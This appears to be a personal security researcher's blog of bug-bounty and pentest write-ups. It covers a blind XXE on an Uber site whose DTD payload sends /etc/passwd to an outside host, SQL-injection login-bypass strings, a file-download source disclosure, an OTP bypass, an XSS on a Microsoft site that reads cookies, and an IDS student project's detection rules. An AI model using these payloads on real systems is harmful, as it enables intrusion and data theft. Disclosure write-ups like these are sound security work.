Friday, 5 August 2016

Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of the UBER'S Website that was in Bug Bounty Program Scope.

On July 26th 2016 Evening I was working on domain ubermovement Web Application.
As it was a small webapp there were no too much parameter to run injections tests. I started the old school tests and the first parameter I came across was the Search Box.


Now, I Attached my Burp Suite then gave a keyword to search and started monitoring the requests...

In Directory "search" I got two requests.
1.The Keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now , For the first request I started the attacks like XSS, SQL, XPATH, XXE, command injections many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with second request...

As there were no parameters so, I Send the request to Repeater and started looking for Directory Based Vulnerabilities.

 
Then, As my all other Injection tests failed lastly I started looking for XXE.

So, First thing I does to change the Request Method to POST and check the response.



As the Response was same as GET Request so I Added the Content-type Header as application/xml
and basic XML Code with "GeneralSearch" as search parameter then checked for Response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The Response was shocking as I got the XML Error.

Now I was about 60% sure that it could lead to XXE. SO, I started the Blind Test for XXE...
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But Still no luck all I was getting the XML Error in response....

Now, I thought lets check the vulnerability via OOB (Out-of-band) Method and perform a Ping Test.

So,
step-1 : I downloaded XAMPP and hosted a Apache Server.
step-2 : I Port forward my IP to port 80 so I can access my server via my Public IP from different networks.
step-3 : I Edited XXE Payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and I got a perfect ping from vulnerable application.




Now, the manual test confirms the vulnerability so I scanned the particular vulnerable request via Acunetix and it detected the vulnerability.


 
Then I Report the Bug First and then started doing further tests with .dtd payloads.

Its turn out to be the various sub-domain for .*ubermovement.com was having the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was Blind XXE Test I was Successful in Ping Test for XXE. But unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to website : http://ubermovement.com/
  2. Attach burp Suite & start intercepting now, click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. NOW,
Send request to repeater & change it to POST.

Eg. Original HTTP Request :

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Now Add content type : Eg. Content-type: application/xml

Request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Deploy web server and host "payload.dtd" File eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  2. Now Add XXE Payload For confirmation :
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload23.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

Request Will Be :

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE : If you view your web server logs you will find a 404 error.

Wednesday, 11 May 2016

That Moment When You Find Authentication Bypass Vulnerability In Bug Bounty Program ?

One whole year has passed, since I joined bug bounty program on various platforms and all I could find was hand full of XSS, XFS,CSRF,CRLF Vulnerability with 2 to 3 logical bugs  and about millions of duplicates...

22nd Dec 2015 Evening I started looking for sub domains of a website that was newly introduced to bug bounty program. After fingerprinting all domains I found a unique domain in which was hosted on IIS Server & running ASP.Net technology at back end. Nmap Scan gave me the version of server & technology. Web Application was running on Windows Server 2003, Microsoft IIS 6.0 with Microsoft SQL Server 2005. That was too old for 2015 technologies, so I go OLD School on one of the parameter of page for search for SQL Injection.


I injected a Quote and in few seconds I received a SQL Error. Now I was sure the SQL Vulnerability was present in this sub-domain. As It was a sub-domain the severity of the bug was less so my main job was to find as many unique sql bugs in the web application. 

The second thought came to my mind was check for All SQL Injection so I gave the Web App the Automated SQL Scan.


After a full scan of web application all I found was 3 Unique Parameter with SQL Bug. But luckily 2 parameters were "Email" & "Password". After seeing them I got an idea for bypassing the Authentication via SQLi. So, know I was able to report two different types of bug.
1. Authentication Bypass via SQLi
2. Error Based SQL Injection.

Now comes the POC Part for both. Exploiting Error Based SQL Injection was easy, If you know how to perform the attack or alternative you can use modern day automated injection tools for creating POC. So I used SQLMap for creating POC for Error based SQL Injection.
   


Now, Creating POC for Authentication Bypass via SQLi...
1. I opened Admin Login Page.


2. Intercepting the Authentication Request Via Burp Suite.


3.  I started brute forcing with different SQLi payloads list goes like :
' or ' 1 ' = ' 1
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

& in the end payload : 'or' '='
wooooooooooo..... at last its worked for me.

So, Finally my both POC was created and successfully received some good amount Bug Bounty for my both Reports.

- Raghav

Tuesday, 3 May 2016

Old School Source Code Disclosure Vulnerability

On May 2nd I started a revaluation of web application for a client. While doing revaluation I found out that they have added some more functions in web app, I started exploring the new features of app every things look fine as they where all static HTML page then suddenly I came across a file "filedownload.php".

Now, my first step was to spider this branch that I did with help of burp suite & the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"

The Path Of Application was disclosed : E:\netpub\vhosts\www\

Then, I simply run the link "http://site.com/filedownload.php?file=" on my browser & I Received a error message from server that :
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"

The moment I saw that error I remember it may be old school GHDB type file download vulnerability so, now I have to check for two type of Vulnerability :
1. LFI - Local File Inclusion
2. Source Code Disclosure

So after doing some Directory Traversal attacks I was sure that LFI was not applicable.

Then I started looking for Web.Config File as the server was working on Windows IIS.
"http://site.com/filedownload.php?file=web.config" the link works but no luck as the file was empty.


Then I, Looked for "index.php" file as many web developers sets there database connection password in "index" file "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file but still the password was not present.


But, I get a hint a file name "UserUtils.php" was linked to the "index.php" file.
So, I started searching for "UserUtils.php" in all available paths I knew. After some hard work I located file inside "E:\netpub\vhosts\www\htdocs\UserUtils.php" Full Link :
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
 & file contains SMTP Server's Administrator Email ID , UserName , Password etc...

 
 But Sill I was not done, I have to find the Database Credentials so, After reading the whole file I found a New Path which have configuration file "admin/include/config.php" & "admin/include/functions.php"

Now, I tried to download Configuration file "http://site.com/filedownload.php?file=admin/include/config.php"


& Cheers I was able to see the Database Credentials as they were in plaintext.

Similar Type Of Attack Video Tutorial : https://www.youtube.com/watch?v=gjREfF5C4RQ

Thanks,


-Raghav Bisht

Wednesday, 20 April 2016

Easiest Authentication Bypass Ever !!!

September 4th 2015,

I was given a revaluation pen-test for a bank's Android/IOS application.
It took me hardly an hour for replicating the test for previous vulnerabilities. When I was done with my work I still got time for sending my report to client. So I started looking to my burp suite history and suddenly I noticed a HTTP Response which was carrying a verification code parameter...



I was shocked as the code was same as OTP that I requested earlier that hour for login to my account. As million question coming to my mind such as how ?, why ? ...etc One thing was clear that the application authentication via OTP was going on at client side.





I had a thought, If the OTP & Verification Codes are present in HTTP Response I can easily Bypass the authentication plus I can change the password for any account I like all I want was victim's User Name or email or mobile number.

So, here goes the POC for How client side OTP Checked is dangerous for users ?

1. I started login with victim mobile no. & user mobile number was checked correctly.







2. Then I was navigated to Enter Password, Forgot Password activity so I  attached my Burp Suite for HTTP Request interception.
  


 3. I clicked on forgot password & a request was generated, I forward the request & intercept the response for that request. Response I received was having verification code.



4. So, I got the verification code, & I was redirected to Verification activity.


5. I put the OTP in form & pressed OK. Then I was successfully entered the Change Password Activity.




Thanks.....



-Raghav Bisht
 
 

Tuesday, 5 January 2016

CTRL+C, +V (Copy Paste) Best Idea To Build Capstone Projects

Hii again...
Hope you liked my previous post "Post XSS At : research.microsoft.com".

Finally its 8th semester the 4 years of fun was going to end in next 5 months and the gang decided to attend first day class on time as a rituals. Professors were well aware that, there will be full strengths on first day, the last day & the day before exams so, they were ready with there A-Bomb for students.
This time the A-Bomb was "Capstone Project". The 10 credit game changing 5 months task either put your grades inside tombstone or rise it above stars. So we hear about the task and with in a week we have to make a 4-5 persons group, choose project & mentors.

The group was made in less then a minute but choosing of project was a tough call so we decided to come up with as many ideas as possible in next 3 days. IIIrd day the team member gather out in class and contributed our ideas eg. shopping website, social networking website, skype like software, google drive like systems etc...

NOTE : Personal advice to students out there looking for projects :
1. Always choose the project that no one is making. [ Different Project ]
2. Project should be sound complex and tough to understand but easiest to program.

So, we thought of above guidelines and neglects the idea of making websites, software because they were so common, similar among other students & came to the conclusion that we are going to make a project related to cyber security as security will be least considerable among other students and professors.

But in cyber security we came across many projects like RAT, Anti-Virus, DMZ etc...
The projects were awesome but the problem was of practical implementation Eg. If we made RAT (Remote Administration Tool) the main task was to get remote connection of our victim PC. That was easy if victim has not disabled there firewall & anti-virus but while giving viva to professors there will be not point saying that "we have to disable the firewall of victim ." It will be a huge fail for the team. So, we go with the easiest one in the book called "IDS" (Intrusion Detection System) it was a perfect project it sounds difficult but once you understand the concept easy to code.

As a developer the biggest question after choosing the project was 3W1H....?????
How to start ?
When to start ?
Where we should start from ?
Who will start ?
The solutions in the books was simple SDLC (Systems Development Life Cycle) but it only works when you know about, what are our you going to start. We only have an idea that ids means "Intrusion Detection System" & its work is to do detection of intruder Eg. If the attacker is trying to get access to our system we should get an alert of his presence.
So ignoring the SDLC concept we started working blind, problem followed by solution concept. Now the ultimate problem was how to code ? which programming language should we choose.
The answer was make is as simple as you can for user & other programmers to understand so we choose Perl & Linux bash scripting.

The week pass we register our project & choose our mentor. The dead line for our first month Report was near and we didn't started our project. We have to show the interface and its features of our projects.By then we know what we have to do we categorized our system in four:
1. Firewall
2. Honeypot
3. DOS Detection  
4. Logs Management

& came with the interface. Our main objective was to create simple scripts for each category.
Eg. For firewall : IP, Port blocking etc...


Month, 1st we wrote simple scripts for Firewall like :
1. Blacklisting IP Address
2. Blacklisting MAC Address
3. Blacklisting Ports
4. Block Website
5. Block Ads
6. Backdoor scanner
7. Trojans scanner

We use simple trick to our use for building these scripts like...
for blacklisting IP, MAC, Ports we use IP Tables Command :

1. IP Blocking :
 iptables -A INPUT -s $ip -j DROP 

2. MAC Blocking : 
iptables -A INPUT -m mac --mac-source $mac -j DROP
iptables -A FORWARD -m mac --mac-source $mac -j DROP


3. Ports Blocking :
 iptables -A INPUT -p tcp --destination-port $Po -j DROP

4. Ads Block :
Parsing the IPS from http://www.spamhaus.org/drop/drop.lasso & blocking with iptables.

5. Backdoor Scanner
Comparing known backdoor signatures with source of the file we want to scan.

6. Blocking Website
using simple DNS HOST file IP Blocking Concept




Month 2nd Creating Honeypot.
Simplest way to understand honeypot is to pretend to be vulnerable for attackers attacks & trap attacker at the time of attack.


How to build a trap ?

Think like an attacker. Attacker always do foot printing, scanning before launching his attack its simple if you do not know about the target you can't move further.

so, building simple trap called PSAD (Port Scan Attack Detection)
In this if attacker try to use different type of N-Map Scan on our system we ill get the alert of IP address doing that scan.

Trick was use a network sniffer Eg. Wireshark, Tshark and create a rule to look for specific TCP flags in the packet that are coming from attacker side.

tshark -i $fa -f "ip proto 6 or ip proto 17" -R "tcp.flags == 16 or tcp.flags == 1 or tcp.flags == 2 or tcp.flags == 18 or tcp.flags == 41 or tcp.flags == 16 or tcp.flags == 0 or ip.len == 28 or icmp.type == 8"   

You must be wondering what is the above tshark command for ok the trick was to view all nmap scan in detail and check for which TCP flag is tried to used for scanning.

Eg. TCP Flags With Decimal Numbers Assigned :
FIN = 1
SYN = 2
RST = 4
PSH = 8
ACK = 16
URG = 32
ECE = 64
CWR = 128


Different Types Scan Using TCP Flags That you can filter out using tshark.

TCP Connect Scan
Filter : ip.proto == 6 and tcp.flags == 18

TCP SYN Scan
Filter : ip.proto == 6 and tcp.flags == 2

TCP FIN Scan
Filter : ip.proto == 6 and tcp.flags == 1

TCP XMAS Scan
Filter : ip.proto == 6 and tcp.flags == 41

TCP NULL Scan
Filter : ip.proto == 6 and tcp.flags == 0

TCP ACK Scan
Filter : ip.proto == 6 and tcp.flags == 16

UDP Scan
Filter : ip.proto == 17 and ip.len = 28



Month 3rd Writing Scripts for DOS / DDos Detection & Log Management.


1. ARP Poisoning Check
The trick was to compare Original Gateway MAC to after attack start MAC
Command Used  : arp -a $ip 

Create a program first store the original I MAC1 the compare the current MAC2 .
If Poison is not MAC1==MAC2
else
Poison is in process

2. HTTP DDos Check
do
check=$(netstat -nap | grep HTTP | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process. 

3. UDP Dos Check
do
check=$(netstat -anp | grep 'udp' | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process. 

4.TCP / IP Dos
use netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n | wc -l for seeing both tcp & udp

5. SYN Dos Check
do
check=$(netstat -nap | grep SYN | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process.  

6. Ping Of Death Check


Sniff network & Check for the size of ICMP Buffer

tshark -i wlan0 -R "icmp.type == 8" -c 200


Log Managements :


In log management use of syslog, command like stat, faillog, last etc were used.

Linux log files were used, checked for update & modification :

/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp", 
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",

"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
 "/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", 
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", 
"/var/log/httpsd/ssl.access_log", "/etc/mail/access", 
 "/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/lock/samba", "/root/.Xauthority", 
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler", 
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all", 
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice",  "/var/log/news/suck.err", "/var/log/news/suck.notice", 
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks", 
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log", 
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"



So finally after 3 months we have completed our Project & started making Report.

Link For Report   : http://www.slideshare.net/raghavbisht9/personal-final-report 
Download Project : https://github.com/raghav007bisht/Intrusion-Detection-System-IDS-v5.0

Monday, 4 January 2016

Post XSS At : "research.microsoft.com"

Hii
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).

NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in  my story Do Ignore.

Link : https://technet.microsoft.com/en-in/security/cc308589.aspx


I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...

so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.

So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(

Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"

Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.


After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link :  http://corp.wamba.com/en/developer/security/?fame

So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.

NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049

After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...

As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/en-us/"

Now, testing Begin's...

On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "


And I Failed....:(

Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.

NOTE : Exactly The Same Report :


Vulnerable Domain :
--------------------------------

http://research.microsoft.com/

Vulnerable Link :
---------------------------

http://research.microsoft.com/apps/mobile/feedback.aspx

Vulnerable Parameter :
-------------------------------------

hiddenReferer=

XSS Payload :
---------------------

javascript:alert(123456789)
javascript:alert(document.
domain)
javascript:alert("XSS____
ALERT_____!!!!_____:_____Hacked___By___Raghav")
Steps To Reproduce :
------------------------------
-
1. Go to vulnerable Link : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Put data in form  and click on submit meanwhile add proxy & intercept HTTP Request.
Then,
Find Vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...

Original Request :
--------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 452

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGShzpE5tzmEw6CKkKDvGHntFLidc5imff8w7mu2zy%2FLMQ%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAARKJNO6sKLVvRzw7zztCu4VtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8s

%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
2BinlORjyb3MDfBMo%2F9Y%3D&ctl00%24bodyPlaceholder

%24hiddenReferer=&Content=1&
Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=asadas&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Edited Request :
-------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 470

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGTXCl2373301Rpe5vIISbXvtNenkjedT%2Bw1VGl4ldsRqw%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAAR2zlRPRPhJi19IJ5naZBSPtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8sBCl6HiMzA

gi%
2F4d3G3Luo2MkPYCKPbIHIh3MWPVPWxGM%3D&ctl00%24bodyPlaceholder%24hiddenReferer=javascript:alert

(123456789)&Content=1&Design=
2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=m&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Response :
------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
NOTE : POC Attached...!!!



And I Failed Again....:(

Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".

As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,

1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.

2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.

 

SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...

Respected...
As per POC for my earlier mail...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------------------------------------------------------


1. Save the vulnerable Page in local system : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Edit source code and add :

</p><form name="aspnetForm" method="post" action="http://research.microsoft.com/apps/mobile/feedback.aspx" id="aspnetForm">

<input name="ctl00$bodyPlaceholder$hiddenReferer" id="ctl00_bodyPlaceholder_
hiddenReferer" type="hidden" value="javascript:alert(document.cookie)">

3. Run in page in Local system & click on submit.
4. When form is successfully submitted Click on  "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------

1. Attacker can host the page and ask for feedback's.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index.php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!


Video POC : https://www.youtube.com/watch?v=uokq33ssLdc

So Finally On November 17th 2015 I got the confirmation of Bug Fixed...




Thank You....!!!!



- Raghav Bisht

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR; AMF is a binary message serialization format geared for remote procedure calls, native to the...